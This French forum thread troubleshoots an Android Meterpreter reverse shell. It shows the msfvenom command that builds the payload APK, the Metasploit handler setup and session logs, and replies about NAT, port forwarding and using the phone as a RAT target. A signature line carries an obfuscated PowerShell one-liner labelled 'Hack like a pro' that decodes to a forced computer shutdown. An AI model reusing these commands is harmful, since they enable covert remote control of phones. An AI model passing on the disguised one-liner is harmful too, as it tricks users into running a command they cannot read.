Annonce

Réduire
Aucune annonce.

Android Meterpreter

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Android Meterpreter

    Bonjour,

    Je viens chercher un peu d'aide pour avancer dans ma compréhension de Meterpreter sous Android sur mon smartphone.
    Je dispose d'une installation Kali 4.11 et de la suite Metasploit sur le PC Attaquant.
    J'ai généré ma charge Meterpreter à l'aide de la commande suivante :
    msfvenom -p android/meterpreter/reverse_tcp LHOST=ADRESSE-IP-EXTERNE-FREEBOX LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk

    Puis, j'ai installé cette charge sur le portable Android 6.0.1 cible et j'ai bien un logiciel MainActivity qui s'affiche.

    Ensuite, sur mon PC attaquant, je saisis (en gras) :
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload android/meterpreter/reverse_tcp
    payload => android/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST ADRESSE-IP-LOCAL-PC-ATTAQUANT
    LHOST => ADRESSE-IP-LOCAL-PC-ATTAQUANT
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(handler) > exploit[*] Exploit running as background job 0.


    Là, je lance MainActivity sur le smartphone (connecté en 4G) :
    msf exploit(handler) >[*] Sending stage (68925 bytes) to ADRESSE-IP-4G[*] Meterpreter session 5 opened (ADRESSE-IP-LOCAL-PC-ATTAQUANT:4444 -> ADRESSE-IP-4G:11501) at 2017-08-31 13:55:56 +0200
    [+] negotiating tlv encryption
    [+] negotiated tlv encryption
    [+] negotiated tlv encryption[*] 37.168.111.170 - Meterpreter session 5 closed. Reason: Died


    J'ai beau répéter l'opération, je n'obtiens jamais le shell Meterpreter.

    Une précision, mon PC attaquant se trouve derrière 2 routeurs : ma Freebox et un autre routeur Wifi. Le port 4444 est bien forwardé de ma Freebox vers le routeur sur l'interface Freebox, et du routeur vers mon PC attaquant sur l'interface de mon routeur.

    Merci d'avance pour votre aide.

    Cordialement.

  • #2
    Notez que j'ai également essayé avec le port 443 (côté cible, côté attaquant et au niveau du routeur en ne me connectant directement à la Freebox[sans le 2ème routeur]).

    Commentaire


    • #3
      Bonjour à toi, Je vais essayer de t'aider mais je n'ai pas kali sous mes yeux, mais de ce que je vien de comprendre tu veut RAT un android qui utilise la connection 4g ? essaye de le faire via un wifi parce que la 4g c'est trouble.
      ps: Dsl j'ai pas trop de connaissance mais je veut quand même aider

      Commentaire


      • #4
        Yes +1 :

        - Une connexion 4G te donne une adresse privée de classe A de type 10.X.X.X. Il y a donc du NAT fait coté opérateur qui peut poser problème.
        - A la limite dans un premier temps, connecte ton tel en wifi sur le même LAN que ta Kali, comme ça tu t'affranchi d’éventuels problèmes de NAT pour tester directement ton exploit.
        - Sinon, essaye un nmap vite fait depuis l'exterieur pour check si ton 4444 sur ton IP pub coté Kali est bien en écoute, et écarter cette partie du problème
        Dernière modification par Krisscool, 01 septembre 2017, 09h34.
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Salut mec

          As-tu attendu quand la sessions a était close pour voir si sa allais se reconnecter ? As-tu fait "sessions entrer" pour voir ?

          Commentaire


          • #6
            Bonjour j'ai le même problème depuis j'ai fait la mise à jour de Kali linux je cherche toujours la solution encore

            Commentaire


            • #7
              Bonjour pour régler ton problème il faut faire la dernière mise à jour voici le lien de téléchargement: https://apt.metasploit.com/

              Commentaire

              Chargement...
              X